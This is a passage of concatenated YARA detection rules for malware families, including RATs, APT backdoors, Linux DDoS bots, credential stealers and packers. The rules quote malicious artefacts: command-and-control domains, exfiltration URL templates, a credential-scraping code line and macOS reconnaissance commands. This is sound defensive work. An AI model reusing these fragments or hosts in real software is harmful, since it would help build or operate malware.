"Detects exploits for CVE-2015-1674" author = "Florian Roth" reference = "http://www.binvul.com/viewthread.php?tid=508" reference2 = "https://github.com/Neo23x0/Loki/blob/master/signatures/exploit_cve_2015_1674.yar" date = "2015-05-14" hash = "af4eb2a275f6bbc2bfeef656642ede9ce04fad36" strings: $s1 = "\\Device\\CNG" fullword wide $s2 = "GetProcAddress" fullword ascii $s3 = "LoadLibrary" ascii $s4 = "KERNEL32.dll" fullword ascii $s5 = "ntdll.dll" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 60KB and all of them } rule Pandora { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Pandora" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "Can't get the Windows version" $b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}=" $c = "JPEG error #%d" wide $d = "Cannot assign a %s to a %s" wide $g = "%s, ProgID:" $h = "clave" $i = "Shell_TrayWnd" $j = "melt.bat" $k = "\\StubPath" $l = "\\logs.dat" $m = "1027|Operation has been canceled!" $n = "466|You need to plug-in! Double click to install... |" $0 = "33|[Keylogger Not Activated!]" condition: all of them } rule Base64_encoded_Executable { meta: description = "Detects an base64 encoded executable (often embedded)" author = "Florian Roth" date = "2015-05-28" score = 50 strings: $s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" // 14 samples in goodware archive $s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" // 26 samples in goodware archive $s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" // 75 samples in goodware archive $s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" // 168 samples in goodware archive $s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" // 28,529 samples in goodware archive condition: 1 of them } rule CredStealESY : For CredStealer { meta: description = "Generic Rule to detect the CredStealer Malware" author = "IsecG – McAfee Labs" date = "2015/05/08" strings: $my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide //malware trying to get keyboard layout $my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8} //specific decryption module condition: $my_hex_string and $my_hex_string2 } rule Typical_Malware_String_Transforms { meta: description = "Detects typical strings in a reversed or otherwise modified form" author = "Florian Roth" reference = "Internal Research" date = "2016-07-31" score = 60 strings: /* Executables */ $e1 = "exe.tsohcvs" fullword ascii $e2 = "exe.ssasl" fullword ascii $e3 = "exe.rerolpxe" fullword ascii $e4 = "exe.erolpxei" fullword ascii $e5 = "exe.23lldnur" fullword ascii $e6 = "exe.dmc" fullword ascii $e7 = "exe.llikksat" fullword ascii /* Libraries */ $l1 = "lld.23lenreK" fullword ascii $l2 = "lld.ESABLENREK" fullword ascii $l3 = "lld.esabtpyrc" fullword ascii $l4 = "lld.trcvsm" fullword ascii $l5 = "LLD.LLDTN" fullword ascii /* Imports */ $i1 = "paeHssecorPteG" fullword ascii $i2 = "sserddAcorPteG" fullword ascii $i3 = "AyrarbiLdaoL" fullword ascii /* Registry */ $r1 = "teSlortnoCtnerruC" fullword ascii $r2 = "nuR\\noisreVtnerruC" fullword ascii /* Folders */ $f1 = "\\23metsys\\" ascii $f2 = "\\23metsyS\\" ascii $f3 = "niB.elcyceR$" fullword ascii $f4 = "%tooRmetsyS%" fullword ascii /* False Positives */ $fp1 = "Application Impact Telemetry Static Analyzer" fullword wide condition: ( uint16(0) == 0x5a4d and 1 of them and not 1 of ($fp*) ) } rule Invoke_mimikittenz { meta: description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1" author = "Florian Roth" reference = "https://github.com/putterpanda/mimikittenz" date = "2016-07-19" score = 90 hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a" strings: $x1 = "[mimikittenz.MemProcInspector]" ascii $s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii $s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii $s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii $s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii condition: ( uint16(0) == 0x7566 and filesize < 60KB and 2 of them ) or $x1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule LinuxAESDDoS { meta: Author = "@benkow_" Date = "2014/09/12" Description = "Strings inside" Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483" strings: $a = "3AES" $b = "Hacker" $c = "VERSONEX" condition: 2 of them } rule LinuxBillGates { meta: Author = "@benkow_" Date = "2014/08/11" Description = "Strings inside" Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429" strings: $a= "12CUpdateGates" $b= "11CUpdateBill" condition: $a and $b } rule LinuxElknot { meta: Author = "@benkow_" Date = "2013/12/24" Description = "Strings inside" Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099" strings: $a = "ZN8CUtility7DeCryptEPciPKci" $b = "ZN13CThreadAttack5StartEP11CCmdMessage" condition: all of them } rule LinuxMrBlack { meta: Author = "@benkow_" Date = "2014/09/12" Description = "Strings inside" Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483" strings: $a = "Mr.Black" $b = "VERS0NEX:%s|%d|%d|%s" condition: $a and $b } rule LinuxTsunami { meta: Author = "@benkow_" Date = "2014/09/12" Description = "Strings inside" Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483" strings: $a = "PRIVMSG %s :[STD]Hitting %s" $b = "NOTICE %s :TSUNAMI <target> <secs>" $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually." condition: $a or $b or $c } rule rootkit { meta: author="xorseed" reference= "https://stuff.rop.io/" strings: $sys1 = "sys_write" nocase ascii wide $sys2 = "sys_getdents" nocase ascii wide $sys3 = "sys_getdents64" nocase ascii wide $sys4 = "sys_getpgid" nocase ascii wide $sys5 = "sys_getsid" nocase ascii wide $sys6 = "sys_setpgid" nocase ascii wide $sys7 = "sys_kill" nocase ascii wide $sys8 = "sys_tgkill" nocase ascii wide $sys9 = "sys_tkill" nocase ascii wide $sys10 = "sys_sched_setscheduler" nocase ascii wide $sys11 = "sys_sched_setparam" nocase ascii wide $sys12 = "sys_sched_getscheduler" nocase ascii wide $sys13 = "sys_sched_getparam" nocase ascii wide $sys14 = "sys_sched_setaffinity" nocase ascii wide $sys15 = "sys_sched_getaffinity" nocase ascii wide $sys16 = "sys_sched_rr_get_interval" nocase ascii wide $sys17 = "sys_wait4" nocase ascii wide $sys18 = "sys_waitid" nocase ascii wide $sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide $sys20 = "sys_rt_sigqueueinfo" nocase ascii wide $sys21 = "sys_prlimit64" nocase ascii wide $sys22 = "sys_ptrace" nocase ascii wide $sys23 = "sys_migrate_pages" nocase ascii wide $sys24 = "sys_move_pages" nocase ascii wide $sys25 = "sys_get_robust_list" nocase ascii wide $sys26 = "sys_perf_event_open" nocase ascii wide $sys27 = "sys_uname" nocase ascii wide $sys28 = "sys_unlink" nocase ascii wide $sys29 = "sys_unlikat" nocase ascii wide $sys30 = "sys_rename" nocase ascii wide $sys31 = "sys_read" nocase ascii wide $sys32 = "kobject_del" nocase ascii wide $sys33 = "list_del_init" nocase ascii wide $sys34 = "inet_ioctl" nocase ascii wide condition: 9 of them } rule exploit { meta: author="xorseed" reference= "https://stuff.rop.io/" strings: $xpl1 = "set_fs_root" nocase ascii wide $xpl2 = "set_fs_pwd" nocase ascii wide $xpl3 = "__virt_addr_valid" nocase ascii wide $xpl4 = "init_task" nocase ascii wide $xpl5 = "init_fs" nocase ascii wide $xpl6 = "bad_file_ops" nocase ascii wide $xpl7 = "bad_file_aio_read" nocase ascii wide $xpl8 = "security_ops" nocase ascii wide $xpl9 = "default_security_ops" nocase ascii wide $xpl10 = "audit_enabled" nocase ascii wide $xpl11 = "commit_creds" nocase ascii wide $xpl12 = "prepare_kernel_cred" nocase ascii wide $xpl13 = "ptmx_fops" nocase ascii wide $xpl14 = "node_states" nocase ascii wide condition: 7 of them } rule nkminer_monero { meta: description = "Detects installer of Monero miner that points to a NK domain" author = "cdoman@alienvault.com" reference = "https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner" tlp = "white" license = "MIT License" strings: $a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" nocase wide ascii $b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" nocase wide ascii $c = "barjuok.ryongnamsan.edu.kp" nocase wide ascii $d = "C:\\SoftwaresInstall\\soft" nocase wide ascii $e = "C:\\Windows\\Sys64\\intelservice.exe" nocase wide ascii $f = "C:\\Windows\\Sys64\\updater.exe" nocase wide ascii $g = "C:\\Users\\Jawhar\\documents\\" nocase wide ascii condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule NSFreeCode : NSFree Family { meta: description = "NSFree code features" author = "Seth Hardy" last_modified = "2014-06-24" strings: // push vars then look for MZ $ = { 53 56 57 66 81 38 4D 5A } // nops then look for PE\0\0 $ = { 90 90 90 90 81 3F 50 45 00 00 } condition: all of them } rule NSFreeStrings : NSFree Family { meta: description = "NSFree Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-24" strings: $ = "\\MicNS\\" nocase $ = "NSFreeDll" wide ascii // xor 0x58 dos stub $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 } condition: any of them } rule NSFree : Family { meta: description = "NSFree" author = "Seth Hardy" last_modified = "2014-06-24" condition: NSFreeCode or NSFreeStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule NaikonCode : Naikon Family { meta: description = "Naikon code features" author = "Seth Hardy" last_modified = "2014-06-25" strings: // decryption $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh $ = { 35 5A 01 00 00} // xor eax, 15ah $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh condition: all of them } rule NaikonStrings : Naikon Family { meta: description = "Naikon Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "NOKIAN95/WEB" $ = "/tag=info&id=15" $ = "skg(3)=&3.2d_u1" $ = "\\Temp\\iExplorer.exe" $ = "\\Temp\\\"TSG\"" condition: any of them } rule Naikon : Family { meta: description = "Naikon" author = "Seth Hardy" last_modified = "2014-06-25" condition: NaikonCode or NaikonStrings } rule Backdoor_Naikon_APT_Sample1 { meta: description = "Detects backdoors related to the Naikon APT" author = "Florian Roth" reference = "https://goo.gl/7vHyvh" date = "2015-05-14" hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba" hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96" strings: $x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii $x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii $x2 = "greensky27.vicp.net" fullword ascii $x3 = "\\tempvxd.vxd.dll" fullword wide $x4 = "otna.vicp.net" fullword ascii $x5 = "smithking19.gicp.net" fullword ascii $s1 = "User-Agent: webclient" fullword ascii $s2 = "\\User.ini" fullword ascii $s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii $s4 = "\\UserProfile.dll" fullword wide $s5 = "Connection:Keep-Alive: %d" fullword ascii $s6 = "Referer: http://%s:%d/" fullword ascii $s7 = "%s %s %s %d %d %d " fullword ascii $s8 = "%s--%s" fullword wide $s9 = "Run File Success!" fullword wide $s10 = "DRIVE_REMOTE" fullword wide $s11 = "ProxyEnable" fullword wide $s12 = "\\cmd.exe" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) or 7 of ($s*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule nAspyUpdateCode : nAspyUpdate Family { meta: description = "nAspyUpdate code features" author = "Seth Hardy" last_modified = "2014-07-14" strings: // decryption loop in dropper $ = { 8A 54 24 14 8A 01 32 C2 02 C2 88 01 41 4E 75 F4 } condition: any of them } rule nAspyUpdateStrings : nAspyUpdate Family { meta: description = "nAspyUpdate Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-14" strings: $ = "\\httpclient.txt" $ = "password <=14" $ = "/%ldn.txt" $ = "Kill You\x00" condition: any of them } rule nAspyUpdate : Family { meta: description = "nAspyUpdate" author = "Seth Hardy" last_modified = "2014-07-14" condition: nAspyUpdateCode or nAspyUpdateStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule NetpassStrings : NetPass Variant { meta: description = "Identifiers for netpass variant" author = "Katie Kleemola" last_updated = "2014-05-29" strings: $exif1 = "Device Protect ApplicatioN" wide $exif2 = "beep.sys" wide //embedded exe name $exif3 = "BEEP Driver" wide //embedded exe description $string1 = "\x00NetPass Update\x00" $string2 = "\x00%s:DOWNLOAD\x00" $string3 = "\x00%s:UPDATE\x00" $string4 = "\x00%s:uNINSTALL\x00" condition: all of ($exif*) or any of ($string*) } rule NetPass : Variant { meta: description = "netpass variant" author = "Katie Kleemola" last_updated = "2014-07-08" condition: NetpassStrings } rule NetTravStrings : NetTraveler Family { meta: description = "Identifiers for NetTraveler DLL" author = "Katie Kleemola" last_updated = "2014-05-20" strings: //network strings $ = "?action=updated&hostid=" $ = "travlerbackinfo" $ = "?action=getcmd&hostid=" $ = "%s?action=gotcmd&hostid=" $ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext=" //debugging strings $ = "\x00Method1 Fail!!!!!\x00" $ = "\x00Method3 Fail!!!!!\x00" $ = "\x00method currect:\x00" $ = /\x00\x00[\w\-]+ is Running!\x00\x00/ $ = "\x00OtherTwo\x00" condition: any of them } rule NetTravExports : NetTraveler Family { meta: description = "Export names for dll component" author = "Katie Kleemola" last_updated = "2014-05-20" strings: //dll component exports $ = "?InjectDll@@YAHPAUHWND__@@K@Z" $ = "?UnmapDll@@YAHXZ" $ = "?g_bSubclassed@@3HA" condition: any of them } rule NetTraveler : Family { meta: description = "Nettravelr" author = "Katie Kleemola" last_updated = "2014-07-08" condition: NetTravExports or NetTravStrings or NetpassStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule NionSpy : win32 { meta: description = "Triggers on old and new variants of W32/NionSpy file infector" reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector" strings: $variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT" $variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1" $variant2013_string = "%s?cstorage=shell&comp=%s" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 1 of ($variant*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule TROJAN_Notepad { meta: Author = "RSA_IR" Date = "4Jun13" File = "notepad.exe v 1.1" MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927" strings: $s1 = "75BAA77C842BE168B0F66C42C7885997" $s2 = "B523F63566F407F3834BCC54AAA32524" condition: $s1 or $s2 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule leverage_a { meta: author = "earada@alienvault.com" version = "1.0" description = "OSX/Leverage.A" date = "2013/09" strings: $a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F" $a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:" $a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'" $script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'" $script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'" $script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'" $properties = "serverVisible \x00" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Odinaff_swift : malware odinaff swift raw{ meta: author = "@j0sm1" date = "2016/10/27" description = "Odinaff malware" reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-083006-4847-99" filetype = "binary" strings: $s1 = "getapula.pdb" $i1 = "wtsapi32.dll" $i2 = "cmpbk32.dll" $i3 = "PostMessageA" $i4 = "PeekMessageW" $i5 = "DispatchMessageW" $i6 = "WTSEnumerateSessionsA" condition: ($s1 or pe.exports("Tyman32")) and (2 of ($i*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule OlyxCode : Olyx Family { meta: description = "Olyx code tricks" author = "Seth Hardy" last_modified = "2014-06-19" strings: $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 } $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C } condition: any of them } rule OlyxStrings : Olyx Family { meta: description = "Olyx Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-19" strings: $ = "/Applications/Automator.app/Contents/MacOS/DockLight" condition: any of them } rule Olyx : Family { meta: description = "Olyx" author = "Seth Hardy" last_modified = "2014-06-19" condition: OlyxCode or OlyxStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule suspicious_packer_section : packer PE { meta: author = "@j0sm1" date = "2016/10/21" description = "The packer/protector section names/keywords" reference = "http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/" filetype = "binary" strings: $s1 = ".aspack" wide ascii $s2 = ".adata" wide ascii $s3 = "ASPack" wide ascii $s4 = ".ASPack" wide ascii $s5 = ".ccg" wide ascii $s6 = "BitArts" wide ascii $s7 = "DAStub" wide ascii $s8 = "!EPack" wide ascii $s9 = "FSG!" wide ascii $s10 = "kkrunchy" wide ascii $s11 = ".mackt" wide ascii $s12 = ".MaskPE" wide ascii $s13 = "MEW" wide ascii $s14 = ".MPRESS1" wide ascii $s15 = ".MPRESS2" wide ascii $s16 = ".neolite" wide ascii $s17 = ".neolit" wide ascii $s18 = ".nsp1" wide ascii $s19 = ".nsp2" wide ascii $s20 = ".nsp0" wide ascii $s21 = "nsp0" wide ascii $s22 = "nsp1" wide ascii $s23 = "nsp2" wide ascii $s24 = ".packed" wide ascii $s25 = "pebundle" wide ascii $s26 = "PEBundle" wide ascii $s27 = "PEC2TO" wide ascii $s28 = "PECompact2" wide ascii $s29 = "PEC2" wide ascii $s30 = "pec1" wide ascii $s31 = "pec2" wide ascii $s32 = "PEC2MO" wide ascii $s33 = "PELOCKnt" wide ascii $s34 = ".perplex" wide ascii $s35 = "PESHiELD" wide ascii $s36 = ".petite" wide ascii $s37 = "ProCrypt" wide ascii $s38 = ".RLPack" wide ascii $s39 = "RCryptor" wide ascii $s40 = ".RPCrypt" wide ascii $s41 = ".sforce3" wide ascii $s42 = ".spack" wide ascii $s43 = ".svkp" wide ascii $s44 = "Themida" wide ascii $s45 = ".Themida" wide ascii $s46 = ".packed" wide ascii $s47 = ".Upack" wide ascii $s48 = ".ByDwing" wide ascii $s49 = "UPX0" wide ascii $s50 = "UPX1" wide ascii $s51 = "UPX2" wide ascii $s52 = ".UPX0" wide ascii $s53 = ".UPX1" wide ascii $s54 = ".UPX2" wide ascii $s55 = ".vmp0" wide ascii $s56 = ".vmp1" wide ascii $s57 = ".vmp2" wide ascii $s58 = "VProtect" wide ascii $s59 = "WinLicen" wide ascii $s60 = "WWPACK" wide ascii $s61 = ".yP" wide ascii $s62 = ".y0da" wide ascii $s63 = "UPX!" wide ascii condition: // DOS stub signature PE signature uint16(0) == 0x5a4d and uint32be(uint32(0x3c)) == 0x50450000 and ( for any of them : ( $ in (0..1024) ) ) } rule PittyTiger { meta: author = " (@chort0)" description = "Detect PittyTiger Trojan via common strings" strings: $ptUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)" // missing minor digit $ptFC001 = "FC001" fullword $ptPittyTiger = "PittyTiger" fullword $trjHTMLerr = "trj:HTML Err." nocase fullword $trjworkFunc = "trj:workFunc start." nocase fullword $trjcmdtout = "trj:cmd time out." nocase fullword $trjThrtout = "trj:Thread time out." nocase fullword $trjCrPTdone = "trj:Create PT done." nocase fullword $trjCrPTerr = "trj:Create PT error: mutex already exists." nocase fullword $oddPippeFailed = "Create Pippe Failed!" fullword // extra 'p' $oddXferingFile = "Transfering File" fullword // missing 'r' $oddParasError = "put Paras Error:" fullword // abbreviated 'parameters'? $oddCmdTOutkilled = "Cmd Time Out..Cmd has been killed." fullword condition: (any of ($pt*)) and (any of ($trj*)) and (any of ($odd*)) } rule PolishBankRAT_srservice_xorloop { meta: author = "Booz Allen Hamilton Dark Labs" description = "Finds the custom xor decode loop for <PolishBankRAT_srservice>" strings: $loop = { 48 8B CD E8 60 FF FF FF 48 FF C3 32 44 1E FF 48 FF CF 88 43 FF } condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $loop } rule PolishBankRAT_fdsvc_xor_loop { meta: author = "Booz Allen Hamilton Dark Labs" description = "Finds the custom xor decode loop for <PolishBankRAT_fdsvc>" strings: $loop = {0F B6 42 FF 48 8D 52 FF 30 42 01 FF CF 75 F1} condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $loop } rule PolishBankRAT_fdsvc_decode2 { meta: author = "Booz Allen Hamilton Dark Labs" description = "Find a constant used as part of a payload decoding function in PolishBankRAT_fdsvc" strings: $part1 = {A6 EB 96} $part2 = {61 B2 E2 EF} $part3 = {0D CB E8 C4} $part4 = {5A F1 66 9C} $part5 = {A4 80 CD 9A} $part6 = {F1 2F 46 25} $part7 = {2F DB 16 26} $part8 = {4B C4 3F 3C} $str1 = "This program cannot be run in DOS mode" condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and all of them } rule decoded_PolishBankRAT_fdsvc_strings { meta: author = "Booz Allen Hamilton Dark Labs" description = "Finds hard coded strings in PolishBankRAT_fdsvc" strings: $str1 = "ssylka" wide ascii $str2 = "ustanavlivat" wide ascii $str3 = "poluchit" wide ascii $str4 = "pereslat" wide ascii $str5 = "derzhat" wide ascii $str6 = "vykhodit" wide ascii $str7 = "Nachalo" wide ascii condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and 4 of ($str*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ponmocup : plugins memory { meta: description = "Ponmocup plugin detection (memory)" author = "Danny Heppener, Fox-IT" reference = "https://foxitsecurity.files.wordpress.com/2015/12/foxit-whitepaper_ponmocup_1_1.pdf" strings: $1100 = {4D 5A 90 [29] 4C 04} $1201 = {4D 5A 90 [29] B1 04} $1300 = {4D 5A 90 [29] 14 05} $1350 = {4D 5A 90 [29] 46 05} $1400 = {4D 5A 90 [29] 78 05} $1402 = {4D 5A 90 [29] 7A 05} $1403 = {4D 5A 90 [29] 7B 05} $1404 = {4D 5A 90 [29] 7C 05} $1405 = {4D 5A 90 [29] 7D 05} $1406 = {4D 5A 90 [29] 7E 05} $1500 = {4D 5A 90 [29] DC 05} $1501 = {4D 5A 90 [29] DD 05} $1502 = {4D 5A 90 [29] DE 05} $1505 = {4D 5A 90 [29] E1 05} $1506 = {4D 5A 90 [29] E2 05} $1507 = {4D 5A 90 [29] E3 05} $1508 = {4D 5A 90 [29] E4 05} $1509 = {4D 5A 90 [29] E5 05} $1510 = {4D 5A 90 [29] E6 05} $1511 = {4D 5A 90 [29] E7 05} $1512 = {4D 5A 90 [29] E8 05} $1600 = {4D 5A 90 [29] 40 06} $1601 = {4D 5A 90 [29] 41 06} $1700 = {4D 5A 90 [29] A4 06} $1800 = {4D 5A 90 [29] 08 07} $1801 = {4D 5A 90 [29] 09 07} $1802 = {4D 5A 90 [29] 0A 07} $1803 = {4D 5A 90 [29] 0B 07} $2001 = {4D 5A 90 [29] D1 07} $2002 = {4D 5A 90 [29] D2 07} $2003 = {4D 5A 90 [29] D3 07} $2004 = {4D 5A 90 [29] D4 07} $2500 = {4D 5A 90 [29] C4 09} $2501 = {4D 5A 90 [29] C5 09} $2550 = {4D 5A 90 [29] F6 09} $2600 = {4D 5A 90 [29] 28 0A} $2610 = {4D 5A 90 [29] 32 0A} $2700 = {4D 5A 90 [29] 8C 0A} $2701 = {4D 5A 90 [29] 8D 0A} $2750 = {4D 5A 90 [29] BE 0A} $2760 = {4D 5A 90 [29] C8 0A} $2810 = {4D 5A 90 [29] FA 0A} condition: any of ($1100,$1201,$1300,$1350,$1400,$1402,$1403,$1404,$1405,$1406, $1500,$1501,$1502,$1505,$1506,$1507,$1508,$1509,$1510,$1511,$1512,$1600,$1601,$1700,$1800,$1801, $1802,$1803,$2001,$2002,$2003,$2004,$2500,$2501,$2550,$2600,$2610,$2700,$2701,$2750,$2760,$2810) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Trj_Ponmocup { meta: author = "Centro Criptológico Nacional (CCN)" ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" description = "Ponmocup Installer" strings: $mz = { 4d 5a } $pac = { 48 8F BB 54 5F 3E 4F 4E } $unp = { 8B B8 7C 1F 46 00 33 C8 } condition: ($mz at 0) and ($pac at 0x61F7C) and ($unp at 0x29F0) } rule Trj_Ponmocup_Downloader { meta: author = "Centro Criptológico Nacional (CCN)" ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" description = "Ponmocup Downloader" strings: $mz = { 4d 5a } $vb5 = "VB5" fullword ascii $tpb = "www.thepiratebay.org" fullword wide $ua = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1)" fullword wide condition: ($mz at 0) and ($vb5) and ($tpb) and ($ua) } rule Trj_Ponmocup_dll { meta: author = "Centro Criptológico Nacional (CCN)" ref ="https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html" description = "Ponmocup Bot DLL" strings: $mz = { 4d 5a } $pck = { 00 81 23 00 33 3E 00 00 3B F4 56 00 00 00 7D 00 } $upk = { 68 F4 14 00 10 A1 6C C0 02 10 FF D0 59 59 E9 7A } condition: ($mz at 0) and ($pck at 0x8a50) and ($upk at 0x61f) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule pony { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-08-16" description = "Identify Pony" strings: $s1 = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" $s2 = "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0" $s3 = "POST %s HTTP/1.0" $s4 = "Accept-Encoding: identity, *;q=0" //$useragent1 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" //$useragent2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)" condition: $s1 and $s2 and $s3 and $s4 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Predator_The_Thief : Predator_The_Thief { meta: description = "Yara rule for Predator The Thief v2.3.5 & +" author = "Fumik0_" date = "2018/10/12" source = "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" strings: $mz = { 4D 5A } $hex1 = { BF 00 00 40 06 } $hex2 = { C6 04 31 6B } $hex3 = { C6 04 31 63 } $hex4 = { C6 04 31 75 } $hex5 = { C6 04 31 66 } $s1 = "sqlite_" ascii wide condition: $mz at 0 and all of ($hex*) and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule PubSabCode : PubSab Family { meta: description = "PubSab code tricks" author = "Seth Hardy" last_modified = "2014-06-19" strings: $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 } condition: any of them } rule PubSabStrings : PubSab Family { meta: description = "PubSab Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-19" strings: $ = "_deamon_init" $ = "com.apple.PubSabAgent" $ = "/tmp/screen.jpeg" condition: any of them } rule PubSab : Family { meta: description = "PubSab" author = "Seth Hardy" last_modified = "2014-06-19" condition: PubSabCode or PubSabStrings } /* This Yara ruleset is under the GNU-GPLv2 license 